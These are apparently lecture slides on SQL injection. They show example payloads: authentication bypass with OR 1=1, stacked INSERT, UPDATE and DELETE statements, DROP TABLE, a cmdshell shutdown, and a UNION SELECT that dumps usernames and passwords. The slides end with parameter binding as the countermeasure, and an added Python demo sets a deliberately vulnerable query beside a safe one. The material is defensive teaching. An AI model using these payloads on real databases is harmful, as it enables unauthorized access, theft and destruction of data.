SQL-Injections

Attacks on data management

Daniel Schosser
Sept. 2012

  1. What is a SQL-Injection?
  2. How do they work?
  3. What damage can a SQL-Injection do?
  4. What counter-measures do we have?

What is a SQL-Injection?

What is SQL?

What is a SQL-Injection?

What can we use SQL for?

What is a SQL-Injection?

What do SQL statements look like?

SELECT *
FROM users
WHERE name="________" AND password="________";--
It consists of:
  • SQL-Syntax
  • Data
  • Logic
  • Metacharacters (*, %, ', --, #, ...)

What is a SQL-Injection?

Where do people use SQL?

What is a SQL-Injection?

Where are SQL-Injections possible?

What is a SQL-Injection?

Example SQL-Statement for a login-form

SELECT *
FROM users
WHERE name="________" AND password="________";--

What is a SQL-Injection?

Example SQL-Statement for a login-form

SELECT *
FROM users
WHERE name="John";--" AND password="________";

What damage can a SQL-Injection do?

Insert unauthorized data

Password: foobar"; INSERT INTO users (name, passwort, email) VALUES ("anonymous", "secret", "anonymous@example.com")

SELECT *
FROM users
WHERE name="not important" AND password="foobar";
INSERT INTO users (name, passwort, email) VALUES
("anonymous", "secret", "anonymous@example.com")";--

What damage can a SQL-Injection do?

Bypass authorisation

Username: "John"
Password: foobar" OR 1=1

SELECT *
FROM users
WHERE name="John" AND password="foobar" OR 1=1";--

What damage can a SQL-Injection do?

Data manipulation

Username: "John"
Password: foobar"; UPDATE users SET password="helloWorld

SELECT *
FROM users
WHERE name="John" AND password="foobar";
UPDATE users SET password="helloWorld";--

What damage can a SQL-Injection do?

Delete data

Username: "John"
Password: foobar"; DELETE FROM users WHERE level="admin

SELECT *
FROM users
WHERE name="John" AND password="foobar";
DELETE FROM users WHERE level="admin";--

What damage can a SQL-Injection do?

GO EXEC cmdshell("shutdown /s");--
Robert"); DROP TABLE Students;--

Gathering information

SELECT * FROM users WHERE 1=1

Gathering information

Problem:
The application expects a username, an email address and the user's password, but the SQL injection returns three differently named columns.

UNION-Statement

We search for books:

2010
title            price   published
SQL Injection    $29     2010
Ethical Hacking  $26.99  2010

UNION-Statement

We search for books:

2010" UNION SELECT username, password, email FROM user#
title            price               published
Administrator    secretPassword      admin@foobar.com
Developer        youWillNeverGuess   developer@foobar.com
SQL Injection    $29                 2010
Support          easyPassword        support@foobar.com
Ethical Hacking  $26.99              2010

What counter-measures do we have?

What counter-measures do we have?

// Parameter binding: the user id is handed to the query builder as a bound
// value (the "?" placeholder), never spliced into the SQL text itself.
public function fetchAllByUserId( $uid )
{
    return $this->fetchAllAbstract(
        $this->getBaseSelect()
             ->where( "users.id = ?", $uid )
    );
}
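As an added example (not code from the slides), the login query from earlier built once by string concatenation and once with bound parameters, run against a constructed in-memory SQLite table through Python's sqlite3 module. Single-quoted string literals are used instead of the slides' double quotes, because SQLite treats double quotes as identifier delimiters; the sample users are constructed for the demo.

```python
import sqlite3

# Constructed sample rows for this demo; they are not data from the slides.
SAMPLE_USERS = [("John", "s3cret"), ("Administrator", "secretPassword")]


def make_db():
    """Create an in-memory users table and fill it with the sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con, name, password):
    """The slides' login query built by string concatenation.

    Syntax, data and logic are mixed into one string, so a quote character
    in the input can end the literal and append logic of its own.
    """
    sql = f"SELECT name FROM users WHERE name='{name}' AND password='{password}'"
    return [row[0] for row in con.execute(sql)]


def login_safe(con, name, password):
    """The same query with bound parameters (the countermeasure).

    The statement text never changes; the driver passes the two values
    separately, so they are only ever compared as data.
    """
    sql = "SELECT name FROM users WHERE name=? AND password=?"
    return [row[0] for row in con.execute(sql, (name, password))]


if __name__ == "__main__":
    db = make_db()
    bad_password = "x' OR '1'='1"  # the slides' tautology, in single-quote form
    print("vulnerable:", login_vulnerable(db, "John", bad_password))  # every user
    print("safe:      ", login_safe(db, "John", bad_password))        # []
```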

What counter-messures do we have?

All input is evil, until proven otherwise!
Michael Howard, David LeBlanc

Thank you!